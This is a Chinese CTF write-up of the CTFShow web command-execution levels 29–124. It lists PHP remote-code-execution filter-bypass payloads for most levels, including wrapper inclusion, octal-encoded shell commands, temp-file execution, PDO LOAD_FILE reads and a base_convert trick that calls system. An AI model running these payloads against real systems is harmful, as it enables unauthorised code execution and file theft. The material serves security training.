CTFShow Web 命令执行 29-124 实战通关指南

参数逃逸 (Web32-36)

Web32

增加了括号过滤，但可利用 include 无需括号的特性。在 c 参数中定义新参数，结合 php://filter 读取文件。

Payload:

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

Web33

类似上题，改用 data 伪协议。注意使用 ?> 提前闭合语句。

Payload:

?c=include%09$_GET[1]?>&1=data://text/plain,<?php system('tac flag.php');?>

Web34-36

可尝试参数逃逸配合日志注入。通过访问 Nginx 访问日志路径，触发包含。

文件包含 + 伪协议 (Web37-39)

Web37

include 漏洞点，支持 data 伪协议执行 PHP 代码。

Payload:

?c=data://text/plain,<?php system("tac fla*")?>

Web38

过滤了 php 关键字，使用短标签 <?= 绕过。

Payload:

?c=data://text/plain,<?= system("tac fla*")?>

Web39

参数后自动拼接 .php。由于 system 执行完即返回，忽略后续字符串。

Payload: 同上 Web38。

无参数 RCE (Web40)

无法传入显式参数，需利用内置函数构造环境。

核心技巧：

• localeconv(): 获取小数点信息，常作为当前目录 . 的替代。
• current(): 取数组第一个元素。
• scandir(): 扫描目录。
• array_reverse(): 反转数组。

扫描目录 Payload:

?c=var_dump(scandir(current(localeconv())));

读取 Flag Payload: 利用反转数组定位 flag 文件。

?c=show_source(next(array_reverse(scandir(current(localeconv())))));

无字母 RCE (Web41)

限制字母和数字，仅保留管道符 |。可通过位或运算重组字符。

思路： 编写脚本遍历 ASCII 码，寻找两个字符按位或后能得到目标字符的组合。

Python 辅助脚本示例:

import re
# 定义正则匹配不可用字符
preg = '[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|-'
# 循环生成组合...

运行脚本生成可用字符映射表后，再构造 payload。

绕过无回显 RCE (Web42-53)

题目将输出重定向至 /dev/null，需截断执行或使用逻辑运算符。

常用技巧：

• ||: 短路逻辑，前命令成功则不执行后命令。
• &&: 逻辑与，前命令成功后才执行后命令。
• &: 后台执行，立即返回。
• <: 重定向输入。

示例 Payload:

?c=tac flag.php||
?c=tac%20flag.php%26

针对特定过滤字符（如分号、空格、flag 关键字），需灵活替换通配符或编码。

关键词模糊匹配 (Web54)

正则表达式如 .*c.*a.*t.* 会匹配包含 c,a,t 顺序出现的任何组合。

绕过思路： 修改文件名，使其不包含敏感字母组合。例如将 flag.php 复制为 ccccc.txt。

Payload:

?c=cp${IFS}f??g.php${IFS}ccccc.txt

字符集受限 RCE (Web55-57)

Web55

过滤大小写字母，允许数字和空格。使用八进制编码命令。

Payload:

?c=$'\164\141\143' $'\146\154\141\147\56\160\150\160'

Web56

过滤字母、数字及部分符号。利用 PHP 文件上传机制，临时文件位于 /tmp/phpXXXXXX。

Payload:

?c=./???/????????[@-[]

配合 Python 脚本上传包含命令的 shell 文件，利用临时文件执行。

Web57

仅允许空格、斜杠、$、()。利用 Shell 算术扩展 $(()) 构造数字。

思路： 通过 ~$(())) 对 0 取反得到 -1，累加得到所需数字索引。

黑盒过滤 POST 参数 (Web58-70)

Web58-65

POST 传参执行 eval。若 system 被禁，可尝试文件读取函数如 highlight_file、readfile。

Web66-67

highlight_file 被禁。使用黄金规则扫描根目录。

Payload:

c=var_dump(scandir('/'));
c=highlight_file("../../flag.txt");

Web68-70

highlight_file 禁用。使用参数逃逸 + php://filter。

Payload:

c=include($_POST[1]);&1=php://filter/convert.base64-encode/resource=../../flag.txt

输出混淆与目录限制 (Web71-72)

Web71

执行结果被正则替换为 ?。提前终止脚本执行使替换失效。

Payload:

c=include("/flag.txt");die();

Web72

开启 open_basedir 限制。无法跨目录读取。

绕过思路： 使用 glob:// 流包装器扫描目录，或尝试 UAF (Use-After-Free) 内存破坏技术劫持函数指针。

UAF 思路: 利用 PHP 对象析构时的内存释放漏洞，伪造对象结构体，将普通函数调用劫持为 system。

数据库与 FFI 利用 (Web73-77)

Web73-74

glob 协议查找文件位置，include 读取。

Web75-76

include 禁用，UAF 禁用。尝试从数据库读取文件。

Payload:

try{$dbh=new PDO('mysql:host=localhost;dbname=information_schema','root','root');
foreach($dbh->query('SELECT LOAD_FILE("/flag36.txt")') as$row){
    echo($row[0])."|";
}}catch(PDOException$e){...};exit();

Web77

PHP 7.4+ 引入 FFI (Foreign Function Interface)。可调用 C 语言函数。

思路： 利用 SUID 权限文件 readflag。FFI 调用 system 执行该程序，重定向输出到可读文件。

环境变量字符拼接 (Web118-122)

Web118

过滤输入，但允许环境变量拼接。提取 ${PWD} 和 ${PATH} 的特定字符组成命令。

Payload:

${PATH:~A}${PWD:~A}${IFS}????.???

Web119-122

进一步限制可用字符。利用 ${#}、${SHLVL}、RANDOM 等特殊变量构造数字和路径。

思路： 通过错误返回值 $? 获取数字 1，结合 HOME 变量获取根路径。

白名单函数利用 (Web124)

仅允许数学函数。利用 base_convert 进行进制转换构造函数名。

思路：

1. 计算 hex2bin 的十进制值，用 base_convert 还原。
2. 计算 _GET 的十六进制值，用 dechex 转换。
3. 动态调用 $_GET 中的参数。

Payload:

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat f*

此处 $pi 最终解析为 _GET，abs 对应 system，acos 对应 cat f*。